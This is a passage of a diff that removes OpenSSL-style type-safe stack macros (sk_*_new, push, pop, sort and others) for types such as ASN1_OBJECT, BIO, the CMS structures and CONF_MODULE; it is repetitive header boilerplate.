-#define sk_ASN1_OBJECT_new(cmp) SKM_sk_new(ASN1_OBJECT, (cmp))
-#define sk_ASN1_OBJECT_new_null() SKM_sk_new_null(ASN1_OBJECT)
-#define sk_ASN1_OBJECT_free(st) SKM_sk_free(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_num(st) SKM_sk_num(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_value(st, i) SKM_sk_value(ASN1_OBJECT, (st), (i))
-#define sk_ASN1_OBJECT_set(st, i, val) SKM_sk_set(ASN1_OBJECT, (st), (i), (val))
-#define sk_ASN1_OBJECT_zero(st) SKM_sk_zero(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_push(st, val) SKM_sk_push(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_unshift(st, val) SKM_sk_unshift(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_find(st, val) SKM_sk_find(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_find_ex(st, val) SKM_sk_find_ex(ASN1_OBJECT, (st), (val))
-#define sk_ASN1_OBJECT_delete(st, i) SKM_sk_delete(ASN1_OBJECT, (st), (i))
-#define sk_ASN1_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_OBJECT, (st), (ptr))
-#define sk_ASN1_OBJECT_insert(st, val, i) SKM_sk_insert(ASN1_OBJECT, (st), (val), (i))
-#define sk_ASN1_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_OBJECT, (st), (cmp))
-#define sk_ASN1_OBJECT_dup(st) SKM_sk_dup(ASN1_OBJECT, st)
-#define sk_ASN1_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(ASN1_OBJECT, (st), (free_func))
-#define sk_ASN1_OBJECT_shift(st) SKM_sk_shift(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_pop(st) SKM_sk_pop(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_sort(st) SKM_sk_sort(ASN1_OBJECT, (st))
-#define sk_ASN1_OBJECT_is_sorted(st) SKM_sk_is_sorted(ASN1_OBJECT, (st))
-
-#define sk_ASN1_STRING_TABLE_new(cmp) SKM_sk_new(ASN1_STRING_TABLE, (cmp))
-#define sk_ASN1_STRING_TABLE_new_null() SKM_sk_new_null(ASN1_STRING_TABLE)
-#define sk_ASN1_STRING_TABLE_free(st) SKM_sk_free(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_num(st) SKM_sk_num(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_value(st, i) SKM_sk_value(ASN1_STRING_TABLE, (st), (i))
-#define sk_ASN1_STRING_TABLE_set(st, i, val) SKM_sk_set(ASN1_STRING_TABLE, (st), (i), (val))
-#define sk_ASN1_STRING_TABLE_zero(st) SKM_sk_zero(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_push(st, val) SKM_sk_push(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_unshift(st, val) SKM_sk_unshift(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_find(st, val) SKM_sk_find(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_find_ex(st, val) SKM_sk_find_ex(ASN1_STRING_TABLE, (st), (val))
-#define sk_ASN1_STRING_TABLE_delete(st, i) SKM_sk_delete(ASN1_STRING_TABLE, (st), (i))
-#define sk_ASN1_STRING_TABLE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_STRING_TABLE, (st), (ptr))
-#define sk_ASN1_STRING_TABLE_insert(st, val, i) SKM_sk_insert(ASN1_STRING_TABLE, (st), (val), (i))
-#define sk_ASN1_STRING_TABLE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_STRING_TABLE, (st), (cmp))
-#define sk_ASN1_STRING_TABLE_dup(st) SKM_sk_dup(ASN1_STRING_TABLE, st)
-#define sk_ASN1_STRING_TABLE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_STRING_TABLE, (st), (free_func))
-#define sk_ASN1_STRING_TABLE_shift(st) SKM_sk_shift(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_pop(st) SKM_sk_pop(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_sort(st) SKM_sk_sort(ASN1_STRING_TABLE, (st))
-#define sk_ASN1_STRING_TABLE_is_sorted(st) SKM_sk_is_sorted(ASN1_STRING_TABLE, (st))
-
-#define sk_ASN1_TYPE_new(cmp) SKM_sk_new(ASN1_TYPE, (cmp))
-#define sk_ASN1_TYPE_new_null() SKM_sk_new_null(ASN1_TYPE)
-#define sk_ASN1_TYPE_free(st) SKM_sk_free(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_num(st) SKM_sk_num(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_value(st, i) SKM_sk_value(ASN1_TYPE, (st), (i))
-#define sk_ASN1_TYPE_set(st, i, val) SKM_sk_set(ASN1_TYPE, (st), (i), (val))
-#define sk_ASN1_TYPE_zero(st) SKM_sk_zero(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_push(st, val) SKM_sk_push(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_unshift(st, val) SKM_sk_unshift(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_find(st, val) SKM_sk_find(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_find_ex(st, val) SKM_sk_find_ex(ASN1_TYPE, (st), (val))
-#define sk_ASN1_TYPE_delete(st, i) SKM_sk_delete(ASN1_TYPE, (st), (i))
-#define sk_ASN1_TYPE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_TYPE, (st), (ptr))
-#define sk_ASN1_TYPE_insert(st, val, i) SKM_sk_insert(ASN1_TYPE, (st), (val), (i))
-#define sk_ASN1_TYPE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_TYPE, (st), (cmp))
-#define sk_ASN1_TYPE_dup(st) SKM_sk_dup(ASN1_TYPE, st)
-#define sk_ASN1_TYPE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_TYPE, (st), (free_func))
-#define sk_ASN1_TYPE_shift(st) SKM_sk_shift(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_pop(st) SKM_sk_pop(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_sort(st) SKM_sk_sort(ASN1_TYPE, (st))
-#define sk_ASN1_TYPE_is_sorted(st) SKM_sk_is_sorted(ASN1_TYPE, (st))
-
-#define sk_ASN1_UTF8STRING_new(cmp) SKM_sk_new(ASN1_UTF8STRING, (cmp))
-#define sk_ASN1_UTF8STRING_new_null() SKM_sk_new_null(ASN1_UTF8STRING)
-#define sk_ASN1_UTF8STRING_free(st) SKM_sk_free(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_num(st) SKM_sk_num(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_value(st, i) SKM_sk_value(ASN1_UTF8STRING, (st), (i))
-#define sk_ASN1_UTF8STRING_set(st, i, val) SKM_sk_set(ASN1_UTF8STRING, (st), (i), (val))
-#define sk_ASN1_UTF8STRING_zero(st) SKM_sk_zero(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_push(st, val) SKM_sk_push(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_unshift(st, val) SKM_sk_unshift(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_find(st, val) SKM_sk_find(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_find_ex(st, val) SKM_sk_find_ex(ASN1_UTF8STRING, (st), (val))
-#define sk_ASN1_UTF8STRING_delete(st, i) SKM_sk_delete(ASN1_UTF8STRING, (st), (i))
-#define sk_ASN1_UTF8STRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_UTF8STRING, (st), (ptr))
-#define sk_ASN1_UTF8STRING_insert(st, val, i) SKM_sk_insert(ASN1_UTF8STRING, (st), (val), (i))
-#define sk_ASN1_UTF8STRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_UTF8STRING, (st), (cmp))
-#define sk_ASN1_UTF8STRING_dup(st) SKM_sk_dup(ASN1_UTF8STRING, st)
-#define sk_ASN1_UTF8STRING_pop_free(st, free_func) SKM_sk_pop_free(ASN1_UTF8STRING, (st), (free_func))
-#define sk_ASN1_UTF8STRING_shift(st) SKM_sk_shift(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_pop(st) SKM_sk_pop(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_sort(st) SKM_sk_sort(ASN1_UTF8STRING, (st))
-#define sk_ASN1_UTF8STRING_is_sorted(st) SKM_sk_is_sorted(ASN1_UTF8STRING, (st))
-
-#define sk_ASN1_VALUE_new(cmp) SKM_sk_new(ASN1_VALUE, (cmp))
-#define sk_ASN1_VALUE_new_null() SKM_sk_new_null(ASN1_VALUE)
-#define sk_ASN1_VALUE_free(st) SKM_sk_free(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_num(st) SKM_sk_num(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_value(st, i) SKM_sk_value(ASN1_VALUE, (st), (i))
-#define sk_ASN1_VALUE_set(st, i, val) SKM_sk_set(ASN1_VALUE, (st), (i), (val))
-#define sk_ASN1_VALUE_zero(st) SKM_sk_zero(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_push(st, val) SKM_sk_push(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_unshift(st, val) SKM_sk_unshift(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_find(st, val) SKM_sk_find(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_find_ex(st, val) SKM_sk_find_ex(ASN1_VALUE, (st), (val))
-#define sk_ASN1_VALUE_delete(st, i) SKM_sk_delete(ASN1_VALUE, (st), (i))
-#define sk_ASN1_VALUE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_VALUE, (st), (ptr))
-#define sk_ASN1_VALUE_insert(st, val, i) SKM_sk_insert(ASN1_VALUE, (st), (val), (i))
-#define sk_ASN1_VALUE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_VALUE, (st), (cmp))
-#define sk_ASN1_VALUE_dup(st) SKM_sk_dup(ASN1_VALUE, st)
-#define sk_ASN1_VALUE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_VALUE, (st), (free_func))
-#define sk_ASN1_VALUE_shift(st) SKM_sk_shift(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_pop(st) SKM_sk_pop(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_sort(st) SKM_sk_sort(ASN1_VALUE, (st))
-#define sk_ASN1_VALUE_is_sorted(st) SKM_sk_is_sorted(ASN1_VALUE, (st))
-
-#define sk_BIO_new(cmp) SKM_sk_new(BIO, (cmp))
-#define sk_BIO_new_null() SKM_sk_new_null(BIO)
-#define sk_BIO_free(st) SKM_sk_free(BIO, (st))
-#define sk_BIO_num(st) SKM_sk_num(BIO, (st))
-#define sk_BIO_value(st, i) SKM_sk_value(BIO, (st), (i))
-#define sk_BIO_set(st, i, val) SKM_sk_set(BIO, (st), (i), (val))
-#define sk_BIO_zero(st) SKM_sk_zero(BIO, (st))
-#define sk_BIO_push(st, val) SKM_sk_push(BIO, (st), (val))
-#define sk_BIO_unshift(st, val) SKM_sk_unshift(BIO, (st), (val))
-#define sk_BIO_find(st, val) SKM_sk_find(BIO, (st), (val))
-#define sk_BIO_find_ex(st, val) SKM_sk_find_ex(BIO, (st), (val))
-#define sk_BIO_delete(st, i) SKM_sk_delete(BIO, (st), (i))
-#define sk_BIO_delete_ptr(st, ptr) SKM_sk_delete_ptr(BIO, (st), (ptr))
-#define sk_BIO_insert(st, val, i) SKM_sk_insert(BIO, (st), (val), (i))
-#define sk_BIO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BIO, (st), (cmp))
-#define sk_BIO_dup(st) SKM_sk_dup(BIO, st)
-#define sk_BIO_pop_free(st, free_func) SKM_sk_pop_free(BIO, (st), (free_func))
-#define sk_BIO_shift(st) SKM_sk_shift(BIO, (st))
-#define sk_BIO_pop(st) SKM_sk_pop(BIO, (st))
-#define sk_BIO_sort(st) SKM_sk_sort(BIO, (st))
-#define sk_BIO_is_sorted(st) SKM_sk_is_sorted(BIO, (st))
-
-#define sk_BY_DIR_ENTRY_new(cmp) SKM_sk_new(BY_DIR_ENTRY, (cmp))
-#define sk_BY_DIR_ENTRY_new_null() SKM_sk_new_null(BY_DIR_ENTRY)
-#define sk_BY_DIR_ENTRY_free(st) SKM_sk_free(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_num(st) SKM_sk_num(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_value(st, i) SKM_sk_value(BY_DIR_ENTRY, (st), (i))
-#define sk_BY_DIR_ENTRY_set(st, i, val) SKM_sk_set(BY_DIR_ENTRY, (st), (i), (val))
-#define sk_BY_DIR_ENTRY_zero(st) SKM_sk_zero(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_push(st, val) SKM_sk_push(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_unshift(st, val) SKM_sk_unshift(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_find(st, val) SKM_sk_find(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_find_ex(st, val) SKM_sk_find_ex(BY_DIR_ENTRY, (st), (val))
-#define sk_BY_DIR_ENTRY_delete(st, i) SKM_sk_delete(BY_DIR_ENTRY, (st), (i))
-#define sk_BY_DIR_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(BY_DIR_ENTRY, (st), (ptr))
-#define sk_BY_DIR_ENTRY_insert(st, val, i) SKM_sk_insert(BY_DIR_ENTRY, (st), (val), (i))
-#define sk_BY_DIR_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BY_DIR_ENTRY, (st), (cmp))
-#define sk_BY_DIR_ENTRY_dup(st) SKM_sk_dup(BY_DIR_ENTRY, st)
-#define sk_BY_DIR_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(BY_DIR_ENTRY, (st), (free_func))
-#define sk_BY_DIR_ENTRY_shift(st) SKM_sk_shift(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_pop(st) SKM_sk_pop(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_sort(st) SKM_sk_sort(BY_DIR_ENTRY, (st))
-#define sk_BY_DIR_ENTRY_is_sorted(st) SKM_sk_is_sorted(BY_DIR_ENTRY, (st))
-
-#define sk_BY_DIR_HASH_new(cmp) SKM_sk_new(BY_DIR_HASH, (cmp))
-#define sk_BY_DIR_HASH_new_null() SKM_sk_new_null(BY_DIR_HASH)
-#define sk_BY_DIR_HASH_free(st) SKM_sk_free(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_num(st) SKM_sk_num(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_value(st, i) SKM_sk_value(BY_DIR_HASH, (st), (i))
-#define sk_BY_DIR_HASH_set(st, i, val) SKM_sk_set(BY_DIR_HASH, (st), (i), (val))
-#define sk_BY_DIR_HASH_zero(st) SKM_sk_zero(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_push(st, val) SKM_sk_push(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_unshift(st, val) SKM_sk_unshift(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_find(st, val) SKM_sk_find(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_find_ex(st, val) SKM_sk_find_ex(BY_DIR_HASH, (st), (val))
-#define sk_BY_DIR_HASH_delete(st, i) SKM_sk_delete(BY_DIR_HASH, (st), (i))
-#define sk_BY_DIR_HASH_delete_ptr(st, ptr) SKM_sk_delete_ptr(BY_DIR_HASH, (st), (ptr))
-#define sk_BY_DIR_HASH_insert(st, val, i) SKM_sk_insert(BY_DIR_HASH, (st), (val), (i))
-#define sk_BY_DIR_HASH_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BY_DIR_HASH, (st), (cmp))
-#define sk_BY_DIR_HASH_dup(st) SKM_sk_dup(BY_DIR_HASH, st)
-#define sk_BY_DIR_HASH_pop_free(st, free_func) SKM_sk_pop_free(BY_DIR_HASH, (st), (free_func))
-#define sk_BY_DIR_HASH_shift(st) SKM_sk_shift(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_pop(st) SKM_sk_pop(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_sort(st) SKM_sk_sort(BY_DIR_HASH, (st))
-#define sk_BY_DIR_HASH_is_sorted(st) SKM_sk_is_sorted(BY_DIR_HASH, (st))
-
-#define sk_CMS_CertificateChoices_new(cmp) SKM_sk_new(CMS_CertificateChoices, (cmp))
-#define sk_CMS_CertificateChoices_new_null() SKM_sk_new_null(CMS_CertificateChoices)
-#define sk_CMS_CertificateChoices_free(st) SKM_sk_free(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_num(st) SKM_sk_num(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_value(st, i) SKM_sk_value(CMS_CertificateChoices, (st), (i))
-#define sk_CMS_CertificateChoices_set(st, i, val) SKM_sk_set(CMS_CertificateChoices, (st), (i), (val))
-#define sk_CMS_CertificateChoices_zero(st) SKM_sk_zero(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_push(st, val) SKM_sk_push(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_unshift(st, val) SKM_sk_unshift(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_find(st, val) SKM_sk_find(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_find_ex(st, val) SKM_sk_find_ex(CMS_CertificateChoices, (st), (val))
-#define sk_CMS_CertificateChoices_delete(st, i) SKM_sk_delete(CMS_CertificateChoices, (st), (i))
-#define sk_CMS_CertificateChoices_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_CertificateChoices, (st), (ptr))
-#define sk_CMS_CertificateChoices_insert(st, val, i) SKM_sk_insert(CMS_CertificateChoices, (st), (val), (i))
-#define sk_CMS_CertificateChoices_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_CertificateChoices, (st), (cmp))
-#define sk_CMS_CertificateChoices_dup(st) SKM_sk_dup(CMS_CertificateChoices, st)
-#define sk_CMS_CertificateChoices_pop_free(st, free_func) SKM_sk_pop_free(CMS_CertificateChoices, (st), (free_func))
-#define sk_CMS_CertificateChoices_shift(st) SKM_sk_shift(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_pop(st) SKM_sk_pop(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_sort(st) SKM_sk_sort(CMS_CertificateChoices, (st))
-#define sk_CMS_CertificateChoices_is_sorted(st) SKM_sk_is_sorted(CMS_CertificateChoices, (st))
-
-#define sk_CMS_RecipientInfo_new(cmp) SKM_sk_new(CMS_RecipientInfo, (cmp))
-#define sk_CMS_RecipientInfo_new_null() SKM_sk_new_null(CMS_RecipientInfo)
-#define sk_CMS_RecipientInfo_free(st) SKM_sk_free(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_num(st) SKM_sk_num(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_value(st, i) SKM_sk_value(CMS_RecipientInfo, (st), (i))
-#define sk_CMS_RecipientInfo_set(st, i, val) SKM_sk_set(CMS_RecipientInfo, (st), (i), (val))
-#define sk_CMS_RecipientInfo_zero(st) SKM_sk_zero(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_push(st, val) SKM_sk_push(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_unshift(st, val) SKM_sk_unshift(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_find(st, val) SKM_sk_find(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_find_ex(st, val) SKM_sk_find_ex(CMS_RecipientInfo, (st), (val))
-#define sk_CMS_RecipientInfo_delete(st, i) SKM_sk_delete(CMS_RecipientInfo, (st), (i))
-#define sk_CMS_RecipientInfo_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_RecipientInfo, (st), (ptr))
-#define sk_CMS_RecipientInfo_insert(st, val, i) SKM_sk_insert(CMS_RecipientInfo, (st), (val), (i))
-#define sk_CMS_RecipientInfo_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_RecipientInfo, (st), (cmp))
-#define sk_CMS_RecipientInfo_dup(st) SKM_sk_dup(CMS_RecipientInfo, st)
-#define sk_CMS_RecipientInfo_pop_free(st, free_func) SKM_sk_pop_free(CMS_RecipientInfo, (st), (free_func))
-#define sk_CMS_RecipientInfo_shift(st) SKM_sk_shift(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_pop(st) SKM_sk_pop(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_sort(st) SKM_sk_sort(CMS_RecipientInfo, (st))
-#define sk_CMS_RecipientInfo_is_sorted(st) SKM_sk_is_sorted(CMS_RecipientInfo, (st))
-
-#define sk_CMS_RevocationInfoChoice_new(cmp) SKM_sk_new(CMS_RevocationInfoChoice, (cmp))
-#define sk_CMS_RevocationInfoChoice_new_null() SKM_sk_new_null(CMS_RevocationInfoChoice)
-#define sk_CMS_RevocationInfoChoice_free(st) SKM_sk_free(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_num(st) SKM_sk_num(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_value(st, i) SKM_sk_value(CMS_RevocationInfoChoice, (st), (i))
-#define sk_CMS_RevocationInfoChoice_set(st, i, val) SKM_sk_set(CMS_RevocationInfoChoice, (st), (i), (val))
-#define sk_CMS_RevocationInfoChoice_zero(st) SKM_sk_zero(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_push(st, val) SKM_sk_push(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_unshift(st, val) SKM_sk_unshift(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_find(st, val) SKM_sk_find(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_find_ex(st, val) SKM_sk_find_ex(CMS_RevocationInfoChoice, (st), (val))
-#define sk_CMS_RevocationInfoChoice_delete(st, i) SKM_sk_delete(CMS_RevocationInfoChoice, (st), (i))
-#define sk_CMS_RevocationInfoChoice_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_RevocationInfoChoice, (st), (ptr))
-#define sk_CMS_RevocationInfoChoice_insert(st, val, i) SKM_sk_insert(CMS_RevocationInfoChoice, (st), (val), (i))
-#define sk_CMS_RevocationInfoChoice_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_RevocationInfoChoice, (st), (cmp))
-#define sk_CMS_RevocationInfoChoice_dup(st) SKM_sk_dup(CMS_RevocationInfoChoice, st)
-#define sk_CMS_RevocationInfoChoice_pop_free(st, free_func) SKM_sk_pop_free(CMS_RevocationInfoChoice, (st), (free_func))
-#define sk_CMS_RevocationInfoChoice_shift(st) SKM_sk_shift(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_pop(st) SKM_sk_pop(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_sort(st) SKM_sk_sort(CMS_RevocationInfoChoice, (st))
-#define sk_CMS_RevocationInfoChoice_is_sorted(st) SKM_sk_is_sorted(CMS_RevocationInfoChoice, (st))
-
-#define sk_CMS_SignerInfo_new(cmp) SKM_sk_new(CMS_SignerInfo, (cmp))
-#define sk_CMS_SignerInfo_new_null() SKM_sk_new_null(CMS_SignerInfo)
-#define sk_CMS_SignerInfo_free(st) SKM_sk_free(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_num(st) SKM_sk_num(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_value(st, i) SKM_sk_value(CMS_SignerInfo, (st), (i))
-#define sk_CMS_SignerInfo_set(st, i, val) SKM_sk_set(CMS_SignerInfo, (st), (i), (val))
-#define sk_CMS_SignerInfo_zero(st) SKM_sk_zero(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_push(st, val) SKM_sk_push(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_unshift(st, val) SKM_sk_unshift(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_find(st, val) SKM_sk_find(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_find_ex(st, val) SKM_sk_find_ex(CMS_SignerInfo, (st), (val))
-#define sk_CMS_SignerInfo_delete(st, i) SKM_sk_delete(CMS_SignerInfo, (st), (i))
-#define sk_CMS_SignerInfo_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_SignerInfo, (st), (ptr))
-#define sk_CMS_SignerInfo_insert(st, val, i) SKM_sk_insert(CMS_SignerInfo, (st), (val), (i))
-#define sk_CMS_SignerInfo_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_SignerInfo, (st), (cmp))
-#define sk_CMS_SignerInfo_dup(st) SKM_sk_dup(CMS_SignerInfo, st)
-#define sk_CMS_SignerInfo_pop_free(st, free_func) SKM_sk_pop_free(CMS_SignerInfo, (st), (free_func))
-#define sk_CMS_SignerInfo_shift(st) SKM_sk_shift(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_pop(st) SKM_sk_pop(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_sort(st) SKM_sk_sort(CMS_SignerInfo, (st))
-#define sk_CMS_SignerInfo_is_sorted(st) SKM_sk_is_sorted(CMS_SignerInfo, (st))
-
-#define sk_CONF_IMODULE_new(cmp) SKM_sk_new(CONF_IMODULE, (cmp))
-#define sk_CONF_IMODULE_new_null() SKM_sk_new_null(CONF_IMODULE)
-#define sk_CONF_IMODULE_free(st) SKM_sk_free(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_num(st) SKM_sk_num(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_value(st, i) SKM_sk_value(CONF_IMODULE, (st), (i))
-#define sk_CONF_IMODULE_set(st, i, val) SKM_sk_set(CONF_IMODULE, (st), (i), (val))
-#define sk_CONF_IMODULE_zero(st) SKM_sk_zero(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_push(st, val) SKM_sk_push(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_unshift(st, val) SKM_sk_unshift(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_find(st, val) SKM_sk_find(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_find_ex(st, val) SKM_sk_find_ex(CONF_IMODULE, (st), (val))
-#define sk_CONF_IMODULE_delete(st, i) SKM_sk_delete(CONF_IMODULE, (st), (i))
-#define sk_CONF_IMODULE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_IMODULE, (st), (ptr))
-#define sk_CONF_IMODULE_insert(st, val, i) SKM_sk_insert(CONF_IMODULE, (st), (val), (i))
-#define sk_CONF_IMODULE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_IMODULE, (st), (cmp))
-#define sk_CONF_IMODULE_dup(st) SKM_sk_dup(CONF_IMODULE, st)
-#define sk_CONF_IMODULE_pop_free(st, free_func) SKM_sk_pop_free(CONF_IMODULE, (st), (free_func))
-#define sk_CONF_IMODULE_shift(st) SKM_sk_shift(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_pop(st) SKM_sk_pop(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_sort(st) SKM_sk_sort(CONF_IMODULE, (st))
-#define sk_CONF_IMODULE_is_sorted(st) SKM_sk_is_sorted(CONF_IMODULE, (st))
-
-#define sk_CONF_MODULE_new(cmp) SKM_sk_new(CONF_MODULE, (cmp))
-#define sk_CONF_MODULE_new_null() SKM_sk_new_null(CONF_MODULE)
-#define sk_CONF_MODULE_free(st) SKM_sk_free(CONF_MODULE, (st))
-#define sk_CONF_MODULE_num(st) SKM_sk_num(CONF_MODULE, (st))
-#define sk_CONF_MODULE_value(st, i) SKM_sk_value(CONF_MODULE, (st), (i))
-#define sk_CONF_MODULE_set(st, i, val) SKM_sk_set(CONF_MODULE, (st), (i), (val))
-#define sk_CONF_MODULE_zero(st) SKM_sk_zero(CONF_MODULE, (st))
-#define sk_CONF_MODULE_push(st, val) SKM_sk_push(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_unshift(st, val) SKM_sk_unshift(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_find(st, val) SKM_sk_find(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_find_ex(st, val) SKM_sk_find_ex(CONF_MODULE, (st), (val))
-#define sk_CONF_MODULE_delete(st, i) SKM_sk_delete(CONF_MODULE, (st), (i))
-#define sk_CONF_MODULE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_MODULE, (st), (ptr))
-#define sk_CONF_MODULE_insert(st, val, i) SKM_sk_insert(CONF_MODULE, (st), (val), (i))
-#define sk_CONF_MODULE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_MODULE, (st), (cmp))
